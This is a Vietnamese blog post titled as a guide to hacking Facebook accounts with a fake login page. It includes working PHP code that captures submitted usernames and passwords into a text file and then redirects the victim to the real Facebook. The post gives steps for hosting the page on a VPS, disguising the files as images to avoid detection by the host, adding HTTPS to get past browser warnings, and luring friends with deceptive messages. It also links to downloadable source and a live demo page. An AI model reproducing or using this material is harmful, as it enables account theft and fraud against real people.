Hack nick facebook bằng trang web giả- phising page

10
4202

Phishing là gì ? Tìm hiểu phương thức Phishing !

Phishing phương thức tạo ra những trang web giả một cách tinh vi để dụ dỗ những người thiếu hiểu biết nhập vào các thông tin như : Tên đăng nhập, mật khẩu, hay các thẻ Visa, Mastercard,… của bất kỳ website thương mại hoặc mạng xã hội nào ví dụ như hack nick facebook.

Phishing được các Hacker áp dụng bằng cách tạo ra một trang website giả mạo có giao diện giống hệt website thật mà Hacker muốn tấn công và những trang Website Phishing thường hay xuất hiện nhất là các trang nổi tiếng như : Ebay, Paypal, Gmail, Facebook.. hay các ngân hàng trực tuyến là những mục tiêu mà Hacker tấn công.

loading...

Hướng dẫn hack mật khẩu Facebook bằng phising page thành công 100%

hack nick facebook
hack nick facebook

Các bước làm :

  1. Chuẩn bị một Host / VPS và Source Code Fake login Website ( Download ), tốt nhất là nên dùng VPS ( Source code ở cuối bài)
  2. Upload source code đó lên host ! ( Download )
  3. Dụ dổ nạn nhân truy cập vào đường dẫn đó, sau khi nạn nhân đăng nhập thì bạn có thể xem mật khẩu ở file!

Thật ra việc tạo một website fake ( phising page) rất đơn giản. Các bạn chỉ cần fake 1 file index.html giống với trang cần làm giả, một file PHP để xử lí thông tin nhập vào từ form và xuất ra file text để lưu thông tin.

File PHP phổ biến có dạng như sau:


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1");
$handle = fopen("users.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

File PHP ở trên sẽ lưu thông tin vào trong users.txt cho bạn.

Tuy nhiên phần khó khăn nhất nếu bạn thực hiện phising là nhà cung cấp hosting của bạn có thể sẽ phát hiện ra file và không cho bạn upload. Chính vì vậy ad đã code và mã hóa file thành dạng ảnh để bypass quá trình check này 😀 . Mọi người có thể tải code full ở đây : Download .

Trang demo: https://taihai.tk/mobile/?id=facebook ( Trang này sẽ tự responsive tùy vào thiết bị bạn đang dùng là mobile hay desktop)

Bước 1 : Các bạn tải tập tin này về : http://shink.in/NJuqL sau đó giải nén ra. sẽ được như hình sau :

 

hack nick facebook
hack nick facebook

Bước 2: Bạn đăng kí 1 hosting hoặc mua 1 VPS ( ở đây ad dùng VPS CentOS gói 5$/ tháng của Vultr) sau đó trỏ tên miền về VPS này. Trong bài viết ad dùng tên miền https://taihai.tk/ của một bạn gửi tặng.

Sau khi đăng kí xong bạn login vào File Manager của máy chủ rồi tiến hành upload toàn bộ file vừa tải về vào thư mục public_html của domain. Bạn yên tâm vì ad đã mã hóa các file cơ bản vào thành file hình ảnh nên nhà cung cấp hosting hoặc VPS sẽ rất khó có thể nhận ra và xóa file của bạn.

Tiến hành upload tất cả file thành công, tiếp theo đó bạn cần CHMOD lại Permisson của file users.txt thành 777 để các file khác có quyền ghi dễ dàng. Đến đây cơ bản là đã xong.

Lưu ý: Để có thể bypass được cảnh báo lừa đảo của trình duyệt trên máy tính thì bạn cần cài đặt HTTPS cho website. Ở trong bài viết ad dùng chứng chỉ của Let’s Encrypt. Chức năng này có thể thực hiện dễ dàng nếu bạn sử dụng VPS.

Bước 3:  Giờ hãy truy cập vào tiên miền của bạn vào thêm tham chiếu “/?id=facebook” để có thể truy cập vào trang.

hack nick facebook
hack nick facebook

Việc bạn cần làm bây giờ chỉ là gửi link này đi cho bạn bè và đợi họ đăng nhập là bạn đã có thể xem được tài khoản và mật khẩu facebook của họ. Đây là lúc bạn phát huy kĩ năng Social Engineering của mình 😀 Các câu lừa quen thuộc như : “Mày vào like hộ tao cái ảnh”, ” Mày vào xem đây có phải ảnh 18+ của mày không” được sử dụng rất nhiều trong lúc này :D.

Thông tin tài khoản sẽ được lưu trữ trong file users.txt. Bạn có thể truy cập thẳng đến file này qua link để xem. Ví dụ : https://taihai.tk/mobile/users.txt

Chúc bạn thành công !

Bài viết mang tính chất tham khảo và học tập. AD sẽ không chịu bất cứ trách nhiệm nào nếu bạn cố ý sử dụng thông tin từ BLOG để phục vụ mục đích bất chính.

Good Luck. Hack to learn not learn to hack !

Link tải code hack nick Facebook : http://shink.me/NJuqL

 

10 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here